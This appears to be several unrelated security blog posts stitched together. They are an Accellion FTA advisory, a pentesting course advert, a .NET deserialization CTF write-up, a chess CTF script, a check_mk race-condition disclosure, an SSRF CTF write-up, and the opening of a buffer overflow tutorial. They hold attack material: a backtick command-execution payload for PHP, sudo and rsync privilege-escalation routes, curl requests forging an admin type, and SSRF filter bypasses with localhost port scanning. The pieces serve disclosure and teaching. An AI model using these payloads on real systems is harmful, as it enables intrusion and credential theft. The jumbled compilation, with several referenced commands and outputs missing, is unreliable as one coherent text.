In the previous vulnerability, one requirement for remote code execution is a writable directory into which a webshell can be written. In practice, there may be no writable directory available, in which case code execution through SQL Injection fails. There is, however, another way to achieve RCE.
The precondition of this vulnerability is knowledge of the Known-Secret-Key stored in the database.
This is not a problem, since the database can be accessed with the SQL Injection vulnerability mentioned earlier. Also, although there are some parameter filters in the code, they can be bypassed!
/home/seos/courier/sfUtils.api
If the Known-Secret-Key has been acquired, the output of decrypt( $_POST[fc] ) is controllable. And although the regular expressions that follow act as a whitelist filter on function names, they do not filter parameters.
Therefore, the only restriction on injecting arbitrary code into the parameters is that the strings must not contain ( or ). Thanks to the flexibility of PHP, there are many ways around this; here are two examples.
Execute system commands directly by using backticks (`)
user_profile_auth(`$_POST[cmd]`);
A more elegant way: use the include syntax to include the tmp_name of an uploaded file, so that any protection gives way.
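Why a function-name whitelist is not enough can be shown with a small Python model. The pattern and the whitelist below are assumptions made for illustration; the actual regular expressions in sfUtils.api are not reproduced in this advisory.

```python
import re

# Hypothetical whitelist; the real list of allowed functions is not shown here.
ALLOWED_FUNCTIONS = {"user_profile_auth"}

# Assumed shape of the filter: "name(arguments);"
CALL_PATTERN = re.compile(r"^(\w+)\((.*)\);$")


def passes_filter(code):
    """Return True if the string would be accepted by this naive filter."""
    match = CALL_PATTERN.match(code)
    if match is None:
        return False
    name, args = match.groups()
    if name not in ALLOWED_FUNCTIONS:
        return False
    # The only check on the arguments: no parentheses allowed.
    return "(" not in args and ")" not in args


blocked_name = passes_filter("system(id);")                        # unknown function
blocked_nested = passes_filter("user_profile_auth(system(id));")   # nested call
accepted = passes_filter("user_profile_auth(`$_POST[cmd]`);")      # backticks slip through
```

The model only checks the name and the absence of parentheses, so the backtick payload shown above is accepted. Validating the arguments themselves, or not evaluating attacker-influenced strings at all, would close the gap.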
Local Privilege Escalation (CVE-2016-2352 and CVE-2016-2353)
After gaining code execution through a PHP page, we found that it ran as the user nobody. To dig deeper, we examined the web environment and identified two possible privilege escalation vulnerabilities.
1. Incorrect Rsync Configuration
/etc/opt/rsyncd.conf
The module soggycat is readable and writable by anyone and maps to the directory /home/soggycat/. An SSH key can therefore be written into /home/soggycat/.ssh/ and then used to log in as soggycat.
2. Command Injection in “yum-client.pl”
To enable system updates through web UI, the sudoers configuration in FTA exceptionally allows the user nobody to directly execute commands with root privileges and update software with the program yum-client.pl.
/etc/sudoers
YUM_CLIENT is the command used for performing updates. Part of the code is as follows:
/usr/local/bin/yum-client.pl
After taking a closer look at yum-client.pl, a Command Injection vulnerability was found in the --cdrom parameter. It lets attackers inject arbitrary commands into the parameter and have them executed as root.
Thus, using the commands below
will grant execution freely as root!
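The underlying pattern can be illustrated in Python, although yum-client.pl itself is a Perl script. The sketch below is an analogy under stated assumptions: echo stands in for the real mount and update commands, the function names are hypothetical, and a POSIX shell is assumed.

```python
import subprocess


def run_unsafe(cdrom):
    # Vulnerable pattern: the parameter is pasted into a shell command line,
    # so shell metacharacters in it are interpreted by the shell.
    result = subprocess.run("echo mounting " + cdrom, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def run_safe(cdrom):
    # Safer pattern: pass an argument list and skip the shell entirely,
    # so the parameter always stays a single argument.
    result = subprocess.run(["echo", "mounting", cdrom],
                            capture_output=True, text=True)
    return result.stdout


payload = "/dev/cdrom; echo INJECTED"
unsafe_output = run_unsafe(payload)  # the part after ';' runs as a second command
safe_output = run_safe(payload)      # the whole payload is echoed back as text
```

In the unsafe variant the text after the semicolon runs as its own command. When such a script is reachable through sudo, that second command runs with root privileges.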
Backdoor
After gaining the highest privilege and carrying out server recon, we found that several backdoors had already been planted on FTA hosts. One of them is an IRC botnet that was mentioned in Niara’s Accellion File Transfer Appliance Vulnerability.
Apart from that, two additional PHP webshells of different types, which had NEVER been noted in public reports, were also identified. Judging from the Apache logs, these backdoors may have been placed by exploiting the CVE-2015-2857 vulnerability discovered in mid-2015.
One of the backdoors is PHPSPY, found on 62 of the online hosts globally. It was placed in
The other is WSO, found on 9 of the online hosts globally, placed in
https://<fta>/courier/themes/templates/imag.php
Acknowledgement
The vulnerabilities described in this advisory were identified in early 2016 while looking for vulnerabilities in Facebook; see the article “How I Hacked Facebook, and Found Someone’s Backdoor Script”.
Upon discovering the FTA vulnerability in early February, I notified Facebook and Accellion and both were very responsive. Accellion responded immediately, issuing patch FTA_9_12_40 on February 12th and notifying all affected customers about the vulnerability and instructions to install the patch. Accellion has been very communicative and cooperative throughout this process.
Timeline
Feb 6, 2016 05:21 Contact Accellion for vulnerability report
Feb 7, 2016 12:35 Send the report to Accellion Support Team
Mar 3, 2016 03:03 Accellion Support Team notifies patch will be made in FTA_9_12_40
May 10, 2016 15:18 Request Advisory submission approval and report the new discovery of two backdoors to Accellion
Jun 6, 2016 10:20 Advisory finalized by mutual consent
I get the question a lot: how do you get into pentesting? I think the shortest way is through web pentesting, and in this post I will explain why I think that.
I have three main reasons why I think learning web assessment is the fastest way to get into the pentesting business:
1) Web is everywhere.
I don’t know whether you noticed, but more or less everything has a web interface. And I am not talking only about the normal web applications on the Internet, which by the way would still provide enough work for all current pentesters for their lifetime. I also mean IoT and embedded devices. Have you noticed, for instance, that when you withdraw money from an ATM it gives you the same clicking sound as old Internet Explorers? They do that because they run old Internet Explorers :). So they are basically web applications running in an ATM-looking box. Also, basically 99% of embedded devices have a web interface: trains, cars, home control systems, your fridge, etc.
2) Market demand
The most obvious attack surface of a product or company is its website, and there were quite a few hyped attacks in the past couple of years. So when you ask somebody what they would protect first, they would say their website. All this built up an acceptable level of security awareness in the web world, which is still lacking in, for instance, the embedded or control system world. It also led to a very high market demand for web assessments. I think right now it is very difficult to find a pentesting job where you wouldn’t do web assessments. Even if you do a network assessment, you will find web applications in the network that you will need to test. At most consulting companies, around 80% of the work is web assessments.
3) The “easiest” to learn
Compared to the other fields of security assessment, web is a very pentester-friendly topic, starting with the fact that HTTP is a plain text protocol. It is much easier and faster to manipulate general web application traffic than some weird proprietary protocol. It is also easier than reversing a binary and exploiting a buffer overflow. These are super interesting topics too; I am only saying that web is the easiest to learn.
There are probably hundreds of other reasons to learn web pentesting, but I think these are the most significant. And with that let me elegantly change the topic to promote my own course. Ohh, did I just say that out loud? Damn. Anyways, you knew already that I was working on it. So I created a full-blown web hacking course cleverly called Web Hacking – Become a Web Pentester. Check it out, there is a promo video where I explain everything and there are quite a few preview lectures that anybody can watch. The normal price is $180, but for my readers I created a coupon code that gives you the course for 50% off. So use the following link: http://aetherlab.net/y/ho
or use the coupon code: HALFOFF
Otherwise let me know what you think about web pentesting.
You’re provided with a big zip file that contains mostly .NET libraries and a few challenge-specific ones. Since the name of the challenge hints at a .NET reversing challenge, I focused on DCTFNetCoreWebApp.dll.
I used dotPeek to decompile it and found the following:
DCTFNetCoreWebApp: Mostly some logic to get the webapp running.
DCTFNetCoreWebApp.Business: Contains the API logic (the Executor class). This contains the allowed actions as well (Notice how getflag is considered an AdminCommand).
DCTFNetCoreWebApp.Controllers: Parser for GET/POST requests revealing the route (/api/command)
abatchy@ubuntu:~/Desktop$ curl https://dotnot.dctf-quals-17.def.camp/api/command
Hi! Nothing here :)
DCTFNetCoreWebApp.Models: Models defining the command layout which we’ll need to communicate with the API.
The meat of the code is the Execute method:
public Command Execute(Command command)
{
    // Need to be authenticated
    if (this._guestActions.Contains(command.Action.ToLower()))
        return this.Authenticate(command);
    if (!this.IsAuthenticated(command))
        throw new Exception("Authentication required!");

    // Is the command of type AdminCommand?
    bool flag = ((MemberInfo) command.GetType()).get_Name().Equals(((MemberInfo) typeof (AdminCommand)).get_Name());
    if (this._adminActions.Contains(command.Action.ToLower()) && !flag)
        throw new Exception("Command not allowed!");
    if (!this._userActions.Contains(command.Action.ToLower()) && !flag)
        throw new Exception("Invalid action");

    string lower = command.Action.ToLower();
    if (lower == "get")
        return this.Get(command);
    if (lower == "set")
        return this.Set(command);
    if (lower == "list")
        return this.List(command);
    if (lower == "readflag")
        return this.ReadFlag(command);
    throw new Exception("Command not implemented!");
}
You need to be authenticated.
Command needs to be of AdminCommand type (inherited).
Let’s try first just contacting the API with a command. Parser for POST:
abatchy@ubuntu:~/Desktop$ curl -X POST -H "Content-Type: application/json" -d '{"Command":{"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }' https://dotnot.dctf-quals-17.def.camp/api/command
Command not allowed!
So unfortunately this command fails because flag is false. We need to cast the JSON to an AdminCommand using the $type field.
I tried setting it to DCTFNetCoreWebApp.Models.AdminCommand but it returned an error message.
abatchy@ubuntu:~/Desktop$ curl -X POST -H "Content-Type: application/json" -d '{"$type":"DCTFNetCoreWebApp.Models.AdminCommand", "Command":{"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }' https://dotnot.dctf-quals-17.def.camp/api/command
Type specified in JSON 'DCTFNetCoreWebApp.Models.AdminCommand' was not resolved. Path '$type', line 1, position 48.
Then I thought of casting it to a class that definitely exists; maybe the error would reveal something.
abatchy@ubuntu:~/Desktop$ curl -X POST -H "Content-Type: application/json" -d '{"Command":{"$type":"System.Guid", "UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }' https://dotnot.dctf-quals-17.def.camp/api/command
Type specified in JSON 'System.Guid, System.Private.CoreLib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e' is not compatible with 'DCTFNetCoreWebApp.Models.Command, DCTFNetCoreWebApp, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'. Path 'Command.$type', line 1, position 33.
Nice! We got the full type name to use: replace Command with AdminCommand in it and we’re good to go.
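Why a client-chosen type defeats the check can be modelled in a few lines of Python. This is a simplified sketch, not the challenge code: KNOWN_TYPES stands in for the deserializer's type resolution, short type names replace the assembly-qualified ones, the contents of the action lists are assumed, and the authentication step is left out.

```python
import json


class Command:
    def __init__(self, UserId, Action):
        self.UserId = UserId
        self.Action = Action


class AdminCommand(Command):
    pass


# Simplified stand-in for how a deserializer resolves "$type" (assumption).
KNOWN_TYPES = {"Command": Command, "AdminCommand": AdminCommand}
USER_ACTIONS = {"get", "set", "list"}  # assumed contents
ADMIN_ACTIONS = {"readflag"}           # assumed contents


def deserialize(raw):
    fields = dict(json.loads(raw)["Command"])
    type_name = fields.pop("$type", "Command")  # the client picks the class
    if type_name not in KNOWN_TYPES:
        raise ValueError("Type %r was not resolved" % type_name)
    return KNOWN_TYPES[type_name](**fields)


def execute(command):
    # Mirrors the decompiled check: compare the runtime type name only.
    is_admin_type = type(command).__name__ == AdminCommand.__name__
    action = command.Action.lower()
    if action in ADMIN_ACTIONS and not is_admin_type:
        raise PermissionError("Command not allowed!")
    if action not in USER_ACTIONS and not is_admin_type:
        raise ValueError("Invalid action")
    return "executed " + action


plain = '{"Command": {"UserId": "u1", "Action": "Readflag"}}'
typed = '{"Command": {"$type": "AdminCommand", "UserId": "u1", "Action": "Readflag"}}'

try:
    plain_result = execute(deserialize(plain))
except PermissionError as exc:
    plain_result = str(exc)
typed_result = execute(deserialize(typed))
```

The authorization decision depends entirely on a type the request itself selects, so adding the type hint is enough to pass the check in this model.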
The Python code provided allows you to make a single move, then it makes some predefined moves. The goal was a bit confusing to me at first, as I wasn’t sure if they wanted the position of the king after the first move only (assuming it survived) or its final position regardless. It was the latter.
I tweaked the code a bit so that it tries all the possible (wrong) moves that would matter, which are the king’s only; moving other pieces is irrelevant. So basically:
Make king move from e1 to X ([a-h][1-8]).
Let bot make moves.
If the king survived those moves, add its position to a set.
This sloppy code does it:
#!/usr/bin/python2.7
column_reference = "a b c d e f g h".split(" ")
EMPTY_SQUARE = " "
row_letters = "abcdefgh"
king_moves = []
position = ''
dest = ''
solution = set([])

# Predefined bot moves, replayed in this order after the king's move
BOT_MOVES = [
    "a2-b2", "b2-c2", "c2-d2", "e2-f2", "f2-g2", "g2-h2", "h2-a1",
    "a1-b1", "b1-c1", "c1-d1", "e1-f1", "f1-g1", "g1-h1", "h1-a3",
    "a3-b3", "b3-c3", "c3-d3", "e3-f3", "f3-g3", "g3-h3", "h3-a4",
    "a4-b4", "b4-c4", "c4-d4", "e4-f4", "f4-g4", "g4-h4", "h4-a5",
    "a5-b5", "b5-c5", "c5-d5", "e5-f5", "f5-g5", "g5-h5", "h5-a6",
    "a6-b6", "b6-c6", "c6-d6", "e6-f6", "f6-g6", "g6-h6", "h6-a7",
    "a7-b7", "b7-c7", "c7-d7", "e7-f7", "f7-g7", "g7-h7",
]


class Model(object):
    def __init__(self):
        self.board = []
        pawn_base = "P " * 8
        white_pieces = "R N B Q K B N R"
        white_pawns = pawn_base.strip()
        black_pieces = white_pieces.lower()
        black_pawns = white_pawns.lower()
        self.board.append(black_pieces.split(" "))
        self.board.append(black_pawns.split(" "))
        for i in range(4):
            self.board.append([EMPTY_SQUARE] * 8)
        self.board.append(white_pawns.split(" "))
        self.board.append(white_pieces.split(" "))

    def move(self, start, destination):
        # Ignore moves that start or end off the board
        for c in [start, destination]:
            if c.i > 7 or c.j > 7 or c.i < 0 or c.j < 0:
                return
        if start.i == destination.i and start.j == destination.j:
            return
        if self.board[start.i][start.j] == EMPTY_SQUARE:
            return
        f = self.board[start.i][start.j]
        self.board[destination.i][destination.j] = f
        self.board[start.i][start.j] = EMPTY_SQUARE


class BoardLocation(object):
    def __init__(self, i, j):
        self.i = i
        self.j = j


class View(object):
    def __init__(self):
        pass

    def display(self, board):
        print("%s: %s" % (" ", column_reference))
        print("-" * 50)
        for i, row in enumerate(board):
            row_marker = 8 - i
            print("%s: %s" % (row_marker, row))


class Controller(object):
    def __init__(self):
        self.model = Model()
        self.view = View()

    def run(self):
        global solution
        # The king's move under test, followed by the bot's moves
        start, destination = self.parse_move(position)
        self.model.move(start, destination)
        for move in BOT_MOVES:
            start, destination = self.parse_move(move)
            self.model.move(start, destination)
        # If the king is still on the board, record where it ended up
        for i, row in enumerate(self.model.board):
            row_marker = 8 - i
            if 'K' in row:
                print "Move: " + position + "({1}{0})".format(row_marker, row_letters[row.index('K')])
                solution.add("{1}{0}".format(row_letters[row.index('K')], row_marker))
        # Print board if needed
        # self.view.display(self.model.board)

    def parse_move(self, move):
        s, d = move.split("-")
        i = 8 - int(s[-1])
        j = column_reference.index(s[0])
        start = BoardLocation(i, j)
        i = 8 - int(d[-1])
        j = column_reference.index(d[0])
        destination = BoardLocation(i, j)
        return start, destination


if __name__ == "__main__":
    for j in '12345678':
        for i in 'abcdefgh':
            king_moves.append('e1-' + i + j)
            dest = i + j
            position = 'e1-' + i + j
            C = Controller()
            C.run()
    solution = sorted(solution)
    out = ''
    for position in solution:
        out = out + position[::-1] + ";"
    print out
The authors of check_mk have fixed a quite interesting vulnerability, which I have recently reported to them, called CVE-2017-14955 (sorry no fancy name here) affecting the oldstable version 1.2.8p25 and below of both check_mk and check_mk Enterprise. It’s basically about a Race Condition vulnerability affecting the login functionality, which in the end leads to the disclosure of authentication credentials to an unauthenticated user. Sounds like a bit of fun, doesn’t it? Let’s dig into it ;-)
How to win a race
You might have seen this login interface before:
While trying to brute force the authentication of check_mk with multiple concurrent threads using the following request:
A really interesting “No such file or directory” is thrown randomly and completely unreliably, which looks like the following:
I guess you find this as interesting as I did, because this Python exception basically contains a copy of all added users including their email addresses, roles, and even their encrypted password.
Triaging
Sometimes I’m really curious about the root cause of some vulnerabilities just like in this specific case. What makes this vulnerability so interesting is the fact that the vulnerability can be triggered by just knowing one valid username, which is usually “omdadmin”.
So as soon as a login fails, the function “on_failed_login()” from /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py is triggered (lines 261-273):
This function basically stores the number of failed login attempts for a valid user and in the end calls another function named “save_users()” with the number of failed login attempts as an argument. When tracing further through the save_users(), you’ll finally come across the vulnerable code part (lines 575-582):
But the vulnerability doesn’t look quite obvious, right? Well it’s basically about a race condition - if you’re not familiar with Race Conditions, just imagine the following situation applied to that code snippet:
When brute-forcing, you usually use multiple, concurrent threads, because otherwise it would take too long.
All of these threads will go through the same instruction set, which means they will call the save_users() function at nearly the same time - depending a bit on the connection delay between the client and the server.
For simplicity let’s imagine, two of these threads are only a tenth of a millisecond away from each other, so “delayed” by just one instruction (in terms of the script shown above).
The first thread passes all instructions and thereby creates a new “users.mk.new” file (line 2), until it reaches the os.rename call (line 8), but has not yet processed the os.rename call.
The second thread, does the very same, but with the mentioned small delay: it passes all instructions including up to line 7, which means it has just closed the “users.mk.new” file and is now about to call the os.rename function as well.
Since the first thread is a bit ahead, it is the first to process the os.rename call and thereby renames the “users.mk.new” file to “users.mk”.
The second thread now tries to do the very same thing, but its own os.rename call still targets the “users.mk.new” file, which was just renamed by the first thread and therefore no longer exists.
Since there is no exception handling built around this instruction set, the Python script fails since the second thread cannot find the file to rename and finally throws the stack trace from above leaking all the credential details.
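The interleaving described in these steps can be replayed deterministically in Python, without real threads. This is a minimal sketch and not the check_mk code: the helper names are hypothetical, and the two "threads" are simply called in the problematic order. The last function shows one common way to avoid the problem, giving each writer its own temporary file.

```python
import os
import tempfile


def write_new(path, content):
    # Step 1 of the vulnerable pattern: every writer uses the same "<path>.new".
    with open(path + ".new", "w") as handle:
        handle.write(content)


def commit(path):
    # Step 2: rename the shared temporary file over the real one.
    os.rename(path + ".new", path)


def save_atomically(path, content):
    # Possible fix (assumption, not the vendor's patch): a unique temporary
    # file per writer, so no rename can lose its source file.
    fd, tmp_path = tempfile.mkstemp(dir=os.path.dirname(path))
    with os.fdopen(fd, "w") as handle:
        handle.write(content)
    os.replace(tmp_path, path)


workdir = tempfile.mkdtemp()
target = os.path.join(workdir, "users.mk")

write_new(target, "written by thread 1")
write_new(target, "written by thread 2")  # same temporary file, overwritten
commit(target)                            # thread 1 renames users.mk.new
try:
    commit(target)                        # thread 2: users.mk.new is gone
    second_error = None
except OSError as exc:
    second_error = exc

save_atomically(target, "first")
save_atomically(target, "second")
with open(target) as handle:
    final_content = handle.read()
```

The second commit() fails with a "No such file or directory" error, which is the exception that ends up in the crash report. With per-writer temporary files both saves succeed and the last one wins.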
A few more things that come into play here:
First: the create_user_file() function doesn’t really play an important role here, since its sole purpose is to create a new File object. So if the file passed to it via its “path” argument already exists in the file system, it will not throw an exception at all.
Second: More interestingly, the application is shipped with an own crash reporting system (see packages/check_mk/check_mk-1.2.8p25/web/htdocs/crash_reporting.py), which prints out all local variables including these very sensitive ones:
Third: There is also another vulnerable instruction set right before the first one at /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py - lines 567 to 573, with exactly the same issue:
About the Vendor Response
Just one word: amazing! I have reported this vulnerability on 2017-09-21, which was a Thursday, and they’ve already pushed a fix to their git on Tuesday 2017-09-25 and at the same time published a new version 1.2.8p26 which contains the official fix. Really commendable work check_mk team!
Exploit time!
An exploit script will be disclosed soon over at Exploit-DB; in the meantime, take it from here:
With the h1-212 CTF, HackerOne offered a really cool chance to win a visit to New York City to hack on some exclusive targets in a top secret location. To be honest, I’m not a CTF guy at all, but this incentive caught my attention. The only thing one had to do in order to participate was: solve the CTF challenge, document the hacky way into it and hope to get selected in the end. So I decided to participate and try to get onto the plane - unfortunately my write-up wasn’t selected in the end, however I still like to share it for learning purposes :-)
Thanks to Jobert and the HackerOne team for creating a fun challenge!
Introduction
The CTF was introduced by just a few lines of story:
An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!
While this sounds like a very self-confident engineer, there is one big hint in these few lines to actually get a first step into the door: acme.org.
The first visit to the given URL at http://104.236.20.43/, showed nothing more than the “default Apache” page:
Identify All the Hints!
While brute-forcing a default Apache2 installation doesn’t make much sense (except if you want to rediscover /icons ;-) ), it was immediately clear that a different approach is required to solve this challenge.
What has proven to be quite fruitful in my bug bounty career is changing the Host header in order to reach other virtual hosts configured on the same web server. In this case, it took me only a single try to find out that the “new admin panel” of “acme.org” is actually located at “admin.acme.org” - so by changing the Host header from “104.236.20.43” to “admin.acme.org”:
The Apache default page was suddenly gone and the web server returned a different response:
As you might have noticed already, there is one line in this response that looks ultimately suspicious: The web application issued a “Set-Cookie” directive setting the value of the “admin” cookie to “no”.
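The Host header technique can be tried out locally with nothing but the Python standard library. The sketch below is a toy model, not the CTF server: the handler, the host name admin.example.test and the page bodies are all made up, and the server listens on a random loopback port.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class VHostHandler(BaseHTTPRequestHandler):
    """Toy server that picks its response based on the Host header."""

    def do_GET(self):
        self.send_response(200)
        if self.headers.get("Host") == "admin.example.test":
            body = b"admin panel"
            self.send_header("Set-Cookie", "admin=no")
        else:
            body = b"default page"
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def fetch(port, host_header):
    # Connect to the same IP and port, but present a different Host header.
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    response = conn.getresponse()
    result = (response.status, response.getheader("Set-Cookie"), response.read())
    conn.close()
    return result


server = HTTPServer(("127.0.0.1", 0), VHostHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
port = server.server_address[1]

default_response = fetch(port, "127.0.0.1")
admin_response = fetch(port, "admin.example.test")

server.shutdown()
server.server_close()
```

Both requests go to the same address; only the Host header differs, and only the second one reveals the cookie.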
Building a Bridge Into the Teapot
While it’s always good to have a healthy portion of self-confidence, the engineer of acme.org seemed to have a bit too much of it when it comes to “the server can’t be hacked”.
Since cookies are actually user-controllable, imagine what would happen if the “admin” cookie value is changed to “yes”?
Surprise, the web application responded differently with an HTTP 405 like the following:
This again means that the HTTP verb needs to be changed. However when changed to HTTP POST:
The web application again responded differently with an HTTP 406 this time:
While googling around for this unusual status code, I came across the following description by W3:
10.4.7 406 Not Acceptable
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.
Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.
Jumping into the Teapot
So it seems to be about a missing Content-Type declaration here. After a “Content-Type” header of “application/json” was added to the request:
A third HTTP response code - HTTP 418 aka “the teapot” was returned:
Now it was pretty obvious that it’s about a JSON-based endpoint. By supplying an empty JSON body as part of the HTTP POST request:
The application responded with the missing parameter name:
Given the parameter name, this somehow smelled a bit like a nifty Server-Side Request Forgery challenge.
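Put together, the request that the previous steps converge on could be built like this in Python. It is only a sketch that constructs the request object without sending it; the header and cookie values are the ones mentioned in this write-up, and the variable names are my own.

```python
import json
import urllib.request

# Target IP from the challenge description; the request is built, not sent.
TARGET_URL = "http://104.236.20.43/"

request = urllib.request.Request(
    TARGET_URL,
    data=json.dumps({}).encode("utf-8"),      # empty JSON body
    method="POST",                            # GET was answered with HTTP 405
    headers={
        "Host": "admin.acme.org",             # virtual host of the admin panel
        "Cookie": "admin=yes",                # flipped from "no"
        "Content-Type": "application/json",   # avoids the HTTP 406
    },
)

# urllib stores header names capitalized, e.g. "Content-type".
summary = (request.get_method(), request.get_header("Host"),
           request.get_header("Cookie"), request.get_header("Content-type"))
```

Passing the object to urllib.request.urlopen() would send it; that call is left out here so the example stays offline.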
Short Excursion to SSRF
What I usually do as a precaution in such scenarios is keep a separate domain like “rcesec.com”, whose authoritative NS servers point to an IP/server under my control in order to be able to spoof DNS requests of all kinds. For example, “ns1.rcesec.com” and “ns2.rcesec.com” are the authoritative NS servers for “rcesec.com”, and both point to the IP address of one of my servers:
On the nameserver side, I do like to use the really awesome tool called “dnschef” by iphelix, which is capable of spoofing all kinds of DNS records like A, AAAA, MX, CNAME or NS to whatever value you like. I usually do point all A records to the loopback address 127.0.0.1 to discover some interesting data:
Breaking the Teapot
Going on with the exploitation and adding a random sub-domain under my domain “rcesec.com”:
resulted in the following response:
Funny side note here: I accidentally bypassed another input filtering which required the subdomain part of the input to the domain parameter to include the string “212”, but I only noticed this by the end of the challenge :-D
So it seems that the application accepted the value and just responded with a reference to a new PHP file (Remember: PHP seems to be Jobert Abma’s favorite programming language ;-) ). When the proposed request was issued against the read.php file:
The application responded with a huge base64-encoded string:
What was even more interesting here, is that the listening dnschef actually received a remote DNS lookup request for “h1-212.rcesec.com” just as a consequence of the read.php call, which it successfully spoofed to “127.0.0.1”:
While this was the confirmation that the application actively interacts with the given “domain” value, there was also a second confirmation in form of the base64-encoded string returned in the response body, which was (when decoded) the actual content of the web server listening on “localhost”:
The Wrong Direction
While I was at first somehow convinced that the flag had to reside somewhere on the localhost (due to a thrill of anticipation probably? ;-) ), I first wanted to retrieve the contents of Apache’s server-status page (which is usually bound to the localhost) to potentially fetch the flag from there on. However when trying to query that page using the following request (remember “h1-212.rcesec.com” did actually resolve to “127.0.0.1”, which applied to all further requests):
The application just returned an error, indicating that there was at least a very basic validation of the domain name in place requiring the domain value to be ended with the string “.com”:
Bypassing the Domain Validation (Part 1)
OK, so the application expected the domain to end with “.com”. While trying to bypass this in common ways, e.g. by using “?”:
The application always responded with:
The same applies to “&”, “#” and (double-) URL-encoded representations of it. However when a semicolon was used:
The application responded again with a reference to the read.php file:
Following that one, indeed returned a base64-encoded string of the server-status output:
While I was thinking “yeah I got it finally”, it turned out that there wasn’t a flag anywhere. Although I think it was also not intended to expose the Apache-Status page at all by the engineer ;-) :
The Right Direction
While I was poking around on the localhost to find the flag for a while without any luck, I decided to go a different way and use the discovered SSRF vulnerability in order to see whether there are any other open ports listening on localhost, which are otherwise not visible from the outside. To be clear: a port scan from the Internet on the target host did only reveal the open ports 22 and 80:
Since port 22 was known to be open, it could be easily verified by using the SSRF vulnerability to check whether the port can actually be reached via localhost as well:
This returned the following output (after querying the read.php file again):
Base64-decoded:
Et voila. Since scanning all ports manually and requesting everything using the read.php file was a bit inefficient, I wrote a small Python script which scans a given range of port numbers (e.g. from 81 to 1338), fetches the “next” response, and finally tries to base64-decode its value:
When run, my script finally discovered another open port: 1337 (damn, that was obvious ;-) ):
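The general shape of such a scanner can be sketched as follows. This is not the script used in the challenge: the two transport functions are placeholders that the caller has to supply (one submits a port through the SSRF and returns an identifier, the other fetches the base64 data for that identifier), and treating an empty result as a closed port is an assumption. Fake implementations are used so the example runs offline.

```python
import base64


def scan_ports(ports, submit, read):
    """Return {port: decoded_bytes} for every port that yields data.

    submit(port) -> identifier and read(identifier) -> base64 text are
    hypothetical callables supplied by the caller.
    """
    results = {}
    for port in ports:
        encoded = read(submit(port))
        if not encoded:
            continue  # assumed: empty data means nothing answered
        try:
            results[port] = base64.b64decode(encoded)
        except ValueError:
            continue  # not valid base64, skip it
    return results


# Offline stand-ins for the two HTTP calls (made-up data).
FAKE_SERVICE_DATA = {22: base64.b64encode(b"banner-22").decode("ascii")}


def fake_submit(port):
    return port  # pretend the identifier is just the port number


def fake_read(identifier):
    return FAKE_SERVICE_DATA.get(identifier, "")


found = scan_ports(range(20, 25), fake_submit, fake_read)
```

Keeping the HTTP details behind two callables means the loop itself can be tested without touching any target.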
Bypassing the Domain Validation (Part 2)
So it seemed like the flag could be located somewhere on the service behind port 1337. However, I noticed an interesting behaviour I hadn’t thought about earlier: when a single slash was used after the port number:
The web application always returned an HTTP 404:
This is simply due to the fact that the semicolon was interpreted by the webserver as part of the path itself. So if “;.com” did not exist on the remote server, the web server did always return an HTTP 404. To overcome this hurdle, a bit of creative thinking was required. Assuming that the flag file would be simply named “flag”, the following must be met in the end:
The domain had to end with “.com”
The URL-splitting characters ?, &, # and their (double-encoded) variants were not allowed
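Based purely on the behaviour observed so far, the validation can be modelled roughly like this. It is a guess at the logic, not the application's code: the function name is made up, example.com stands in for the real domain, and the encoded variants of the rejected characters are left out.

```python
# Characters the application rejected in the earlier attempts
REJECTED_CHARACTERS = ("?", "&", "#")


def passes_validation(domain):
    """Rough model of the observed filter (assumption, not the real code)."""
    if not domain.endswith(".com"):
        return False
    return not any(char in domain for char in REJECTED_CHARACTERS)


plain_domain = passes_validation("h1-212.example.com")
path_only = passes_validation("h1-212.example.com/server-status")
query_trick = passes_validation("h1-212.example.com/server-status?.com")
semicolon_trick = passes_validation("h1-212.example.com/server-status;.com")
```

In this model the check only looks at the end of the string and at a short list of rejected characters, which is why the semicolon variant is accepted.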
In the end the following request actually met all conditions:
Here I used a Unicode-based linefeed character to split the domain name into two parts. This actually triggered two separate requests, which could be observed in the number added to the read.php file and its “id” parameter. So when a single request without the linefeed character was issued:
the application returned the ID “0”:
However when the linefeed payload was issued:
The read.php ID parameter was suddenly increased by two to “2” instead:
This indicated that the application actually accepted both “domains”, leading to two different requests being sent. Querying the ID value minus 1 therefore returned the results from the call to “h1-212.rcesec.com:1337/flag”:
Et voila:
Base64-decoding the “data” value finally revealed the flag:
I will try to write as much as possible, but this will not happen too often.
I will probably talk about my projects, NetRipper and Shellcode Compiler, reverse engineering or exploit development, but I will also try to cover web application security.
I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction to the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows.
Introduction
This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts.
The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is no DEP or ASLR, things that will be detailed later.
I would like to start with a short introduction to assembly (ASM) language. It will not be very detailed, but I will briefly describe the concepts required to understand what a “buffer overflow” vulnerability looks like and how it can be exploited. There are multiple types of buffer overflows; here we will discuss only the easiest one to understand, the stack based buffer overflow.
Introduction to ASM
